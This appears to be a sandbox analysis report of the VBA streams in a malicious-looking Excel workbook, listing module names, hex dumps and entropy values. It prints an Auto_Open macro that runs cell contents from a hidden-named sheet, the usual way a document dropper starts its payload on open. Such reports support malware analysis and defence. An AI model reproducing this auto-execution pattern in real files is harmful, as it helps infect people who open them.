                                                                                                                                                  Application Version:16.0300

                                                                                                                                                  Streams with VBA

                                                                                                                                                  VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Blasr
                                                                                                                                                  VBA File Name:Blasr.bas
                                                                                                                                                  Stream Size:1166
                                                                                                                                                  Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  "Blasr"
                                                                                                                                                  Application.Run
                                                                                                                                                  Attribute
                                                                                                                                                  Auto_Open()
                                                                                                                                                  VB_Name
                                                                                                                                                  Private
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Blasr"
                                                                                                                                                  Private Sub Auto_Open()
                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("AJ6")
                                                                                                                                                  
                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  
                                                                                                                                                  End Sub
                                                                                                                                                  VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Briks
                                                                                                                                                  VBA File Name:Briks.cls
                                                                                                                                                  Stream Size:990
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  "Briks"
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Briks"
                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Byutut
                                                                                                                                                  VBA File Name:Byutut.bas
                                                                                                                                                  Stream Size:1056
                                                                                                                                                  Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  "Byutut"
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Byutut"
                                                                                                                                                  VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Class1
                                                                                                                                                  VBA File Name:Class1.cls
                                                                                                                                                  Stream Size:1151
                                                                                                                                                  Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Class1"
                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = False
                                                                                                                                                  Attribute VB_Exposed = False
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = False
                                                                                                                                                  VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Class2
                                                                                                                                                  VBA File Name:Class2.cls
                                                                                                                                                  Stream Size:999
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Class2"
                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = False
                                                                                                                                                  Attribute VB_Exposed = False
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = False
                                                                                                                                                  VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Class3
                                                                                                                                                  VBA File Name:Class3.cls
                                                                                                                                                  Stream Size:999
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Class3"
                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = False
                                                                                                                                                  Attribute VB_Exposed = False
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = False
                                                                                                                                                  VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Kikide
                                                                                                                                                  VBA File Name:Kikide.cls
                                                                                                                                                  Stream Size:1249
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  "Kikide"
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Kikide"
                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True
                                                                                                                                                  VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/UserForm1
                                                                                                                                                  VBA File Name:UserForm1.frm
                                                                                                                                                  Stream Size:1526
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "UserForm1"
                                                                                                                                                  Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = False
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = False
                                                                                                                                                  VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Vrest
                                                                                                                                                  VBA File Name:Vrest.bas
                                                                                                                                                  Stream Size:679
                                                                                                                                                  Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  Attribute
                                                                                                                                                  "Vrest"
                                                                                                                                                  VB_Name
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Vrest"
                                                                                                                                                  VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/Vsewd
                                                                                                                                                  VBA File Name:Vsewd.cls
                                                                                                                                                  Stream Size:990
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  "Vsewd"
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  Attribute VB_Name = "Vsewd"
                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                  Attribute VB_GlobalNameSpace = False
                                                                                                                                                  Attribute VB_Creatable = False
                                                                                                                                                  Attribute VB_PredeclaredId = True
                                                                                                                                                  Attribute VB_Exposed = True
                                                                                                                                                  Attribute VB_TemplateDerived = False
                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:856
                                                                                                                                                  Entropy:5.31019504221
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                  Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:209
                                                                                                                                                  Entropy:3.32661660177
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                  Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                  Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/\x1CompObj
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:97
                                                                                                                                                  Entropy:3.61064918306
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:266
                                                                                                                                                  Entropy:4.62034133633
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                  Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                  Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/f
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:38
                                                                                                                                                  Entropy:1.54052096453
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/o
                                                                                                                                                  File Type:empty
                                                                                                                                                  Stream Size:0
                                                                                                                                                  Entropy:0.0
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:
                                                                                                                                                  Data Raw:
                                                                                                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:4263
                                                                                                                                                  Entropy:4.38205341073
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                  Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1024
                                                                                                                                                  Entropy:6.73319737871
                                                                                                                                                  Base64 Encoded:True
